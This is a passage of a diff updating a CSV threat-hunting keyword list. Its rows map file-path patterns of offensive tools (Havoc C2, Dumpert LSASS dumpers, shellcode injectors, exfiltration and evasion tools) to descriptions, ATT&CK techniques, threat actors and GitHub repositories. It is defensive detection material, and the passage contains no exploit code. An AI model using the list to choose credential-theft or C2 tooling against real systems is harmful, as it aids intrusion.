Evasion","https://github.com/bats3c/DarkLoadLibrary","1","0","N/A","10","9","874","184","2021-10-22T07:27:58Z","2021-06-17T08:33:47Z" +"*\DarkLoadLibrary.*","offensive_tool_keyword","DarkLoadLibrary","LoadLibrary for offensive operations","T1071.001 - T1055.002 - T1055.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bats3c/DarkLoadLibrary","1","0","N/A","10","9","875","184","2021-10-22T07:27:58Z","2021-06-17T08:33:47Z" "*\dcrypt.exe*","offensive_tool_keyword","DiskCryptor","DiskCryptor is an open source encryption solution that offers encryption of 
all disk partitions including system partitions","T1486 ","TA0040","N/A","N/A","Ransomware","https://github.com/DavidXanatos/DiskCryptor","1","0","N/A","10","4","361","96","2023-08-13T11:20:25Z","2019-04-20T14:51:18Z" "*\dcrypt.sys*","offensive_tool_keyword","DiskCryptor","DiskCryptor is an open source encryption solution that offers encryption of all disk partitions including system partitions","T1486 ","TA0040","N/A","N/A","Ransomware","https://github.com/DavidXanatos/DiskCryptor","1","0","N/A","10","4","361","96","2023-08-13T11:20:25Z","2019-04-20T14:51:18Z" "*\DCrypt\Bin*","offensive_tool_keyword","DiskCryptor","DiskCryptor is an open source encryption solution that offers encryption of all disk partitions including system partitions","T1486 ","TA0040","N/A","N/A","Ransomware","https://github.com/DavidXanatos/DiskCryptor","1","0","N/A","10","4","361","96","2023-08-13T11:20:25Z","2019-04-20T14:51:18Z" "*\dcrypt_setup.exe*","offensive_tool_keyword","DiskCryptor","DiskCryptor is an open source encryption solution that offers encryption of all disk partitions including system partitions","T1486 ","TA0040","N/A","N/A","Ransomware","https://github.com/DavidXanatos/DiskCryptor","1","0","N/A","10","4","361","96","2023-08-13T11:20:25Z","2019-04-20T14:51:18Z" "*\decrypted.dmp*","offensive_tool_keyword","PPLBlade","Protected Process Dumper Tool that support obfuscating memory dump and transferring it on remote workstations without dropping it onto the disk.","T1003.001 - T1027.004 - T1560.001 - T1039 - T1570","TA0006 - TA0005 - TA0010 - TA0003","N/A","N/A","Credential Access - Data Exfiltration","https://github.com/tastypepperoni/PPLBlade","1","0","N/A","10","4","324","36","2023-08-30T07:59:51Z","2023-08-29T19:36:04Z" "*\DelegationBOF.*","offensive_tool_keyword","DelegationBOF","This tool uses LDAP to check a domain for known abusable Kerberos delegation settings. Currently. it supports RBCD. Constrained. Constrained w/Protocol Transition. 
and Unconstrained Delegation checks.","T1098 - T1214 - T1552","TA0006","N/A","N/A","Credential Access","https://github.com/IcebreakerSecurity/DelegationBOF","1","1","N/A","N/A","10","115","21","2022-05-04T14:00:36Z","2022-03-28T20:14:24Z" -"*\demiguise.py*","offensive_tool_keyword","demiguise","The aim of this project is to generate .html files that contain an encrypted HTA file. The idea is that when your target visits the page. the key is fetched and the HTA is decrypted dynamically within the browser and pushed directly to the user. This is an evasion technique to get round content / file-type inspection implemented by some security-appliances. This tool is not designed to create awesome HTA content. There are many other tools/techniques that can help you with that. What it might help you with is getting your HTA into an environment in the first place. and (if you use environmental keying) to avoid it being sandboxed.","T1564 - T1071.001 - T1071.004 - T1059 - T1070","TA0002 - TA0011 - TA0008","N/A","N/A","Defense Evasion","https://github.com/nccgroup/demiguise","1","0","N/A","9","10","1321","262","2022-11-09T08:12:25Z","2017-07-26T08:56:15Z" -"*\demon.dll*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","10","10","4893","746","2023-10-03T23:32:31Z","2022-09-11T13:21:16Z" -"*\demon.x64.bin*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - 
TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","10","10","4893","746","2023-10-03T23:32:31Z","2022-09-11T13:21:16Z" -"*\demon.x64.exe*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","10","10","4893","746","2023-10-03T23:32:31Z","2022-09-11T13:21:16Z" -"*\demon1.dll*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","10","10","4893","746","2023-10-03T23:32:31Z","2022-09-11T13:21:16Z" -"*\demosyscalls.exe*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","10","10","4893","746","2023-10-03T23:32:31Z","2022-09-11T13:21:16Z" +"*\demiguise.py*","offensive_tool_keyword","demiguise","The aim of this project is to generate .html files that contain an encrypted HTA file. The idea is that when your target visits the page. the key is fetched and the HTA is decrypted dynamically within the browser and pushed directly to the user. This is an evasion technique to get round content / file-type inspection implemented by some security-appliances. 
This tool is not designed to create awesome HTA content. There are many other tools/techniques that can help you with that. What it might help you with is getting your HTA into an environment in the first place. and (if you use environmental keying) to avoid it being sandboxed.","T1564 - T1071.001 - T1071.004 - T1059 - T1070","TA0002 - TA0011 - TA0008","N/A","N/A","Defense Evasion","https://github.com/nccgroup/demiguise","1","0","N/A","9","10","1322","262","2022-11-09T08:12:25Z","2017-07-26T08:56:15Z" +"*\demon.dll*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*\demon.x64.bin*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*\demon.x64.exe*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*\demon1.dll*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and 
control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*\demosyscalls.exe*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" "*\Dendrobate\*","offensive_tool_keyword","Dendrobate","Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code","T1055.012 - T1059.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Dendrobate","1","0","N/A","10","2","122","27","2021-11-19T12:18:50Z","2021-02-15T11:15:51Z" "*\Dendron.bin*","offensive_tool_keyword","Dendrobate","Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code","T1055.012 - T1059.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Dendrobate","1","0","N/A","10","2","122","27","2021-11-19T12:18:50Z","2021-02-15T11:15:51Z" "*\Dendron.exe*","offensive_tool_keyword","Dendrobate","Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code","T1055.012 - T1059.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Dendrobate","1","0","N/A","10","2","122","27","2021-11-19T12:18:50Z","2021-02-15T11:15:51Z" 
"*\Dendron.sln*","offensive_tool_keyword","Dendrobate","Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code","T1055.012 - T1059.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Dendrobate","1","0","N/A","10","2","122","27","2021-11-19T12:18:50Z","2021-02-15T11:15:51Z" +"*\dfscoerce.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" "*\DInjector.sln*","offensive_tool_keyword","Dinjector","Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL","T1055 - T1055.012 - T1055.001 - T1027.002","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Metro-Holografix/DInjector","1","0","private github repo","10","","N/A","","","" "*\DInjector\*","offensive_tool_keyword","Dinjector","Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL","T1055 - T1055.012 - T1055.001 - T1027.002","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Metro-Holografix/DInjector","1","0","private github repo","10","","N/A","","","" "*\dist\sigthief.exe*","offensive_tool_keyword","metatwin","The project is designed as a file resource cloner. 
Metadata including digital signature is extracted from one file and injected into another","T1553.002 - T1114.001 - T1564.003","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/threatexpress/metatwin","1","0","N/A","9","4","303","72","2022-05-18T18:32:51Z","2017-10-08T13:26:00Z" "*\dllexploit.cpp*","offensive_tool_keyword","RunAsWinTcb","RunAsWinTcb uses an userland exploit to run a DLL with a protection level of WinTcb-Light.","T1073.002 - T1055.001 - T1055.002","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/tastypepperoni/RunAsWinTcb","1","0","N/A","10","2","119","16","2022-08-02T16:35:50Z","2022-07-29T16:36:06Z" "*\dllexploit.exe*","offensive_tool_keyword","RunAsWinTcb","RunAsWinTcb uses an userland exploit to run a DLL with a protection level of WinTcb-Light.","T1073.002 - T1055.001 - T1055.002","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/tastypepperoni/RunAsWinTcb","1","0","N/A","10","2","119","16","2022-08-02T16:35:50Z","2022-07-29T16:36:06Z" -"*\DllExport.bat*","offensive_tool_keyword","C2 related tools","PowerShell rebuilt in C# for Red Teaming purposes","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - 
Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","761","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" -"*\DllVoidFunction.txt*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10978","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" -"*\dnscan.py*","offensive_tool_keyword","dnscan","dnscan is a python wordlist-based DNS subdomain scanner.","T1595 - T1595.002 - T1018 - T1046","TA0007 - TA0043","N/A","N/A","Reconnaissance","https://github.com/rbsec/dnscan","1","0","N/A","6","10","984","413","2022-08-09T11:11:31Z","2013-03-13T10:42:07Z" -"*\DocsPLZ.cpp*","offensive_tool_keyword","DocPlz","Documents Exfiltration and C2 project","T1105 - T1567 - T1071","TA0011 - TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/TheD1rkMtr/DocPlz","1","0","N/A","10","1","48","6","2023-10-03T23:06:53Z","2023-10-02T20:49:22Z" -"*\DocsPLZ.exe*","offensive_tool_keyword","DocPlz","Documents Exfiltration and C2 project","T1105 - T1567 - T1071","TA0011 - TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/TheD1rkMtr/DocPlz","1","0","N/A","10","1","48","6","2023-10-03T23:06:53Z","2023-10-02T20:49:22Z" +"*\DllExport.bat*","offensive_tool_keyword","C2 related tools","PowerShell rebuilt in C# for Red Teaming purposes","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 
- T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","762","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" +"*\DllVoidFunction.txt*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*\dnscan.py*","offensive_tool_keyword","dnscan","dnscan is a python wordlist-based DNS subdomain scanner.","T1595 - T1595.002 - T1018 - T1046","TA0007 - TA0043","N/A","N/A","Reconnaissance","https://github.com/rbsec/dnscan","1","0","N/A","6","10","985","413","2022-08-09T11:11:31Z","2013-03-13T10:42:07Z" +"*\DocsPLZ.cpp*","offensive_tool_keyword","DocPlz","Documents Exfiltration and C2 project","T1105 - T1567 - T1071","TA0011 - TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/TheD1rkMtr/DocPlz","1","0","N/A","10","1","81","13","2023-10-03T23:06:53Z","2023-10-02T20:49:22Z" +"*\DocsPLZ.exe*","offensive_tool_keyword","DocPlz","Documents Exfiltration and C2 project","T1105 - T1567 - T1071","TA0011 - TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/TheD1rkMtr/DocPlz","1","0","N/A","10","1","81","13","2023-10-03T23:06:53Z","2023-10-02T20:49:22Z" "*\DoHC2.cs*","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). 
This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","0","N/A","10","10","432","99","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z" -"*\DomainRecon\*.txt","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" -"*\donut.exe*","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","1","N/A","N/A","10","2877","557","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z" -"*\donut\VanillaProgram.bin*","offensive_tool_keyword","NtRemoteLoad","Remote Shellcode Injector","T1055 - T1027 - T1218.010","TA0002 - TA0005 - TA0010","N/A","N/A","Exploitation tool","https://github.com/florylsk/NtRemoteLoad","1","0","N/A","10","2","173","35","2023-08-27T17:14:44Z","2023-08-27T16:52:31Z" +"*\DomainRecon\*.txt","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*\donut.exe*","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. 
DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","1","N/A","N/A","10","2878","558","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z" +"*\donut\VanillaProgram.bin*","offensive_tool_keyword","NtRemoteLoad","Remote Shellcode Injector","T1055 - T1027 - T1218.010","TA0002 - TA0005 - TA0010","N/A","N/A","Exploitation tool","https://github.com/florylsk/NtRemoteLoad","1","0","N/A","10","2","175","35","2023-08-27T17:14:44Z","2023-08-27T16:52:31Z" "*\Doraemon*","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*\duedlligence.dll*","offensive_tool_keyword","DueDLLigence","Shellcode runner framework for application whitelisting bypasses and DLL side-loading","T1055.012 - T1218.011","TA0004 - TA0005","N/A","N/A","Defense 
Evasion","https://github.com/mandiant/DueDLLigence","1","0","N/A","10","5","441","90","2023-06-02T14:24:43Z","2019-10-04T18:34:27Z" -"*\dumper.ps1*","offensive_tool_keyword","PowershellKerberos","Some scripts to abuse kerberos using Powershell","T1558.003 - T1558.004 - T1059.001","TA0006 - TA0002","N/A","N/A","Exploitation Tools","https://github.com/MzHmO/PowershellKerberos","1","0","N/A","9","3","262","37","2023-07-27T09:53:47Z","2023-04-22T19:16:52Z" -"*\dumpert.*","offensive_tool_keyword","cobaltstrike","LSASS memory dumper using direct system calls and API unhooking.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/Dumpert/tree/master/Dumpert-Aggressor","1","0","N/A","10","10","1312","237","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z" -"*\Dumpert\*","offensive_tool_keyword","cobaltstrike","LSASS memory dumper using direct system calls and API unhooking.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - 
T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/Dumpert/tree/master/Dumpert-Aggressor","1","0","N/A","10","10","1312","237","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z" +"*\drop-sc.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*\duedlligence.dll*","offensive_tool_keyword","DueDLLigence","Shellcode runner framework for application whitelisting bypasses and DLL side-loading","T1055.012 - T1218.011","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/mandiant/DueDLLigence","1","0","N/A","10","5","442","90","2023-06-02T14:24:43Z","2019-10-04T18:34:27Z" +"*\dumper.ps1*","offensive_tool_keyword","PowershellKerberos","Some scripts to abuse kerberos using Powershell","T1558.003 - T1558.004 - T1059.001","TA0006 - TA0002","N/A","N/A","Exploitation 
Tools","https://github.com/MzHmO/PowershellKerberos","1","0","N/A","9","3","263","37","2023-07-27T09:53:47Z","2023-04-22T19:16:52Z" +"*\dumpert.*","offensive_tool_keyword","cobaltstrike","LSASS memory dumper using direct system calls and API unhooking.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/Dumpert/tree/master/Dumpert-Aggressor","1","0","N/A","10","10","1314","237","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z" +"*\Dumpert\*","offensive_tool_keyword","cobaltstrike","LSASS memory dumper using direct system calls and API unhooking.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - 
T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/Dumpert/tree/master/Dumpert-Aggressor","1","0","N/A","10","10","1314","237","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z" "*\DumpShellcode*","offensive_tool_keyword","cobaltstrike","Takes the original PPLFault and the original included DumpShellcode and combinds it all into a BOF targeting cobalt strike.","T1055 - T1078.003","TA0002 - TA0006","N/A","N/A","Credential Access","https://github.com/trustedsec/PPLFaultDumpBOF","1","0","N/A","N/A","2","115","11","2023-05-17T12:57:20Z","2023-05-16T13:02:22Z" "*\dumpXor.exe*","offensive_tool_keyword","cobaltstrike","dump lsass","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - 